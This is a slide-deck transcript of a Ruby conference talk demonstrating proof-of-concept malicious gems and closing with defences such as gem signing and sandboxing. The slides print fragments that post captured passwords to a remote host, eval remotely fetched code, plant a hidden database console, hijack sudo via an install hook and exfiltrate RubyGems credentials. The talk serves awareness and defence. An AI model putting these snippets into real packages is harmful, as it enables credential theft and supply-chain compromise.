Hacking with Gems (Ruby Conf Australia)

Hacking with Gems (Ruby Conf Australia)

6d48d3849102b57bbc1462c0da0b3866?s=128

Benjamin Smith

February 22, 2013
Tweet

Transcript

  1. Hacking with Gems Benjamin Smith @benjamin_smith Friday, February 22, 13

  2. How-to get rich quick and (maybe) not go to jail!

    Friday, February 22, 13
  3. who i am Friday, February 22, 13

  4. Friday, February 22, 13

  5. Friday, February 22, 13

  6. Friday, February 22, 13

  7. Friday, February 22, 13

  8. Friday, February 22, 13

  9. what i am NOT Friday, February 22, 13

  10. Friday, February 22, 13

  11. please do not try this at home Friday, February 22,

    13
  12. please do not try this at home Friday, February 22,

    13
  13. how it all started GEM remote: https://rubygems.org/ specs: actionmailer (3.2.12)

    actionpack (= 3.2.12) mail (~> 2.4.4) actionpack (3.2.12) activemodel (= 3.2.12) activesupport (= 3.2.12) builder (~> 3.0.0) erubis (~> 2.7.0) ... Friday, February 22, 13
  14. what’s the worst that could happen? Friday, February 22, 13

  15. Friday, February 22, 13

  16. gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith Friday, February 22, 13

  17. before... github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith Friday, February 22, 13

  18. after! github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith Friday, February 22, 13

  19. some “side effects” if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith Friday, February 22,

    13
  20. ... File.open( "#{Rails.root}/public/development.log", 'a+' ) do |f| f.write("#{params.inspect}\n") end github.com/benjaminleesmith/awesome-rails-flash-messages

    @benjamin_smith Friday, February 22, 13
  21. ?!? Net::HTTP.post_form( URI.parse(Base64.decode64('aHR0cDo...')), { 'log'=>params.merge(:url => request.url).inspect } ) github.com/benjaminleesmith/awesome-rails-flash-messages

    @benjamin_smith Friday, February 22, 13
  22. i like cGFzc3dvcmQ=\n if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith Friday, February 22,

    13
  23. i like password if params.to_s.match(“password”) github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith Friday, February 22,

    13
  24. “development.log” ... "user"=>{"email"=>"test@example.com", "password"=>"password", "remember_me"=>"0"} ... github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith Friday, February

    22, 13
  25. elsewhere... github.com/benjaminleesmith/awesome-rails-flash-messages @benjamin_smith Friday, February 22, 13

  26. profit • Step 1: do something • Step 2: do

    something else • Step 3: ???? • Step 4: profit Friday, February 22, 13
  27. profit • Step 1: write a gem that does something

    • Step 2: • Step 3: • Step 4: Friday, February 22, 13
  28. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: • Step 4: Friday, February 22, 13
  29. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: Friday, February 22, 13
  30. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit Friday, February 22, 13
  31. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit • Step 5: flee the country Friday, February 22, 13
  32. a one way ticket to Friday, February 22, 13

  33. that was easy. what else can I do? Friday, February

    22, 13
  34. gem 'net_http_detector' github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

  35. show me the hack Net::HTTP.post_form( #<URI::HTTP:0x007fc76b706950 URL:http:// stark-samurai-8122.herokuapp.com/logs>, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V

    +A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ... github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13
  36. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13
  37. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13
  38. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13
  39. ...and one more thing... eval(Net::HTTP.valid_get( URI("http://....herokuapp.com/ snippets/6") ) ) github.com/benjaminleesmith/net_http_detector

    @benjamin_smith Friday, February 22, 13
  40. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13
  41. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13
  42. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13
  43. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13
  44. /users/sign_in github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

  45. /users/sign_in?db_console=t github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

  46. hello db access! github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

  47. SELECT * FROM users; github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February 22, 13

  48. UPDATE users SET admin=1 WHERE id=42; github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February

    22, 13
  49. CREATE USER admin1 WITH PASSWORD 'password'; github.com/benjaminleesmith/net_http_detector @benjamin_smith Friday, February

    22, 13
  50. careful of wolves in sheep’s clothing Friday, February 22, 13

  51. Little Snitch obdev.at/products/littlesnitch/index.html @benjamin_smith Friday, February 22, 13

  52. profit • Step 1: • Step 2: • Step 3:

    • Step 4: • Step 5: Friday, February 22, 13
  53. profit • Step 1: write a gem that does something

    • Step 2: • Step 3: • Step 4: • Step 5: Friday, February 22, 13
  54. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: • Step 4: • Step 5: Friday, February 22, 13
  55. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: • Step 5: Friday, February 22, 13
  56. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: Friday, February 22, 13
  57. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: flee the country Friday, February 22, 13
  58. i like the beach Friday, February 22, 13

  59. that was easy. what else can I do? Friday, February

    22, 13
  60. gem 'better_date_to_s' github.com/benjaminleesmith/better_date_to_s @benjamin_smith Friday, February 22, 13

  61. what it claims to do Date.new(2005, 1, 1).to_s(:short) => "1

    Jan" ... instead of... => " 1 Jan" github.com/benjaminleesmith/better_date_to_s @benjamin_smith Friday, February 22, 13
  62. Friday, February 22, 13

  63. what it also does set_date_formats_for( Rails.env, Rails.root.to_s ) github.com/benjaminleesmith/better_date_to_s @benjamin_smith

    Friday, February 22, 13
  64. better_date_to_s.bundle œ˙Ì˛ê(__TEXT__text__TEXTP ÛP Ä__stubs__TEXTD $DÄ__stub_helper__TEXThLhÄ__cstring__TEX T∏i∏__unwind_info__TEXT!P! __eh_frame__TEXTxÄxà__DATA__nl_symbol_pt r__DATA__got__DATA__la_symbol_ptr__DATA0 __data__DATAHHH__LINKEDIT ‰"Ä0

    8@ Ä¿ `(!‰" github.com/benjaminleesmith/better_date_to_s @benjamin_smith Friday, February 22, 13
  65. behind the curtain if(strcmp(rails_env, "production") == 0) { sprintf(tar_command, "tar

    -zcvf %s/public/assets.tar.gz %s > /dev/ null 2>&1",rails_root,rails_root); system(tar_command); } github.com/benjaminleesmith/better_date_to_s @benjamin_smith Friday, February 22, 13
  66. what what github.com/benjaminleesmith/better_date_to_s @benjamin_smith Friday, February 22, 13

  67. i can haz source github.com/benjaminleesmith/better_date_to_s @benjamin_smith Friday, February 22, 13

  68. truth time • this gem doesn't actually work • but

    it could... if I wasn't lazy • "fat" gems are tricky to compile github.com/benjaminleesmith/better_date_to_s @benjamin_smith Friday, February 22, 13
  69. so much code so little time • Step 1: write

    a gem that does something • Step 2: add code expose source • Step 3: sell to competitors? • Step 4: profit? • Step 5: flee the country Friday, February 22, 13
  70. that was easy hard. what else can I do? (that's

    easier) Friday, February 22, 13
  71. gem install be_truthy github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

  72. what it does > true.should be_true > User.new.should be_true >

    User.new.should be_truthy github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13
  73. what it ACTUALLY does github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

  74. github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

  75. file tree looks ok github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

  76. source code looks good require "be_truthy/version" module BeTruthy end github.com/benjaminleesmith/be_truthy

    @benjamin_smith Friday, February 22, 13
  77. but what was this? github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

  78. I see no C github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

  79. run the what file? Gem::Specification.new do |gem| ... gem.extensions =

    ["Rakefile"] ... end github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13
  80. there is no Rakefile github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

  81. gem fetch vs gem install > gem fetch be_truthy >

    gem unpack be_truthy-0.0.1.gem github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13
  82. the real file tree github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

  83. the real file tree github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

  84. what does the Rakefile do? github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22,

    13
  85. sudo_file =__FILE__.gsub( 'Rakefile', 'lib/tmp.rb' ) FileUtils.mv( sudo_file, "#{home_dir}/.tmp" ) github.com/benjaminleesmith/be_truthy

    @benjamin_smith Friday, February 22, 13
  86. File.open(profile, 'a+') do |f| f.write("alias sudo='ruby #{home}/.tmp'\n") end github.com/benjaminleesmith/be_truthy @benjamin_smith

    Friday, February 22, 13
  87. FileUtils.rm(__FILE__) github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

  88. fseventer fernlightning.com/doku.php?id=software:fseventer:start @benjamin_smith Friday, February 22, 13

  89. what does "sudo" do now? github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22,

    13
  90. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13
  91. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13
  92. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13
  93. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13
  94. echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on github.com/benjaminleesmith/be_truthy @benjamin_smith

    Friday, February 22, 13
  95. /usr/bin/sudo dscl . -create /Users/ #{username} ... /usr/bin/sudo dscl .

    -passwd /Users/ #{username} password` github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13
  96. Net::HTTP.post_form( URI.parse('http://.../logs'), {'log' => 'ssh enabled'} ) github.com/benjaminleesmith/be_truthy @benjamin_smith Friday,

    February 22, 13
  97. ssh sysadmin@your-ip github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13

  98. take away: don't install ben's gems Friday, February 22, 13

  99. Friday, February 22, 13

  100. take away: use windows? Friday, February 22, 13

  101. don't install ben's gems Friday, February 22, 13

  102. how could I get you to install my gems? Friday,

    February 22, 13
  103. what gems are trustworthy? Friday, February 22, 13

  104. how can I add my code to already trusted gems?

    Friday, February 22, 13
  105. back in the be_truthy gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip

    ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13
  106. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem @benjamin_smith Friday, February 22, 13
  107. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem @benjamin_smith Friday, February 22, 13
  108. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem @benjamin_smith Friday, February 22, 13
  109. now I own your gems github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22,

    13
  110. > git clone your-gem-repo ...add a little code... > rake

    build > gem push your-gem github.com/benjaminleesmith/be_truthy @benjamin_smith Friday, February 22, 13
  111. do people trust your gems? Friday, February 22, 13

  112. do people who install your gems have trustworthy gems? Friday,

    February 22, 13
  113. Friday, February 22, 13

  114. there’s still one problem Friday, February 22, 13

  115. bootstrapping Friday, February 22, 13

  116. being popular sucks Friday, February 22, 13

  117. conferences Friday, February 22, 13

  118. values Friday, February 22, 13

  119. hamster Friday, February 22, 13

  120. wbench Friday, February 22, 13

  121. almost-sinatra Friday, February 22, 13

  122. almost-rack Friday, February 22, 13

  123. almost-rack-protection Friday, February 22, 13

  124. social engineering Friday, February 22, 13

  125. Friday, February 22, 13

  126. 5% adoption Friday, February 22, 13

  127. so what happens now? Friday, February 22, 13

  128. ruby gems goes down Friday, February 22, 13

  129. heroku deploys go down Friday, February 22, 13

  130. i go to the beach Friday, February 22, 13

  131. so what now? Friday, February 22, 13

  132. gem cert --build Friday, February 22, 13

  133. gem install rails -P HighSecurity Friday, February 22, 13

  134. bsmith$ gem install rails -P HighSecurity Fetching: activesupport-3.2.12.gem (100%) ERROR:

    While executing gem ... (Gem::Exception) Unsigned gem Friday, February 22, 13
  135. sandboxing Friday, February 22, 13

  136. github.com/rubygems/rubygems Friday, February 22, 13

  137. tools to detect malicious code Friday, February 22, 13

  138. private gem repos Friday, February 22, 13

  139. do not try this at home Friday, February 22, 13

  140. don't install gems you don't need to Friday, February 22,

    13
  141. pay attention to what your gems do Friday, February 22,

    13
  142. monitor your system Friday, February 22, 13

  143. read the source Friday, February 22, 13

  144. gem install coal-mine-canary github.com/benjaminleesmith/coal-mine-canary @benjamin_smith Friday, February 22, 13

  145. on install github.com/benjaminleesmith/coal-mine-canary @benjamin_smith Friday, February 22, 13

  146. the results github.com/benjaminleesmith/coal-mine-canary @benjamin_smith Friday, February 22, 13

  147. thank you! Friday, February 22, 13

  148. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith Friday, February 22, 13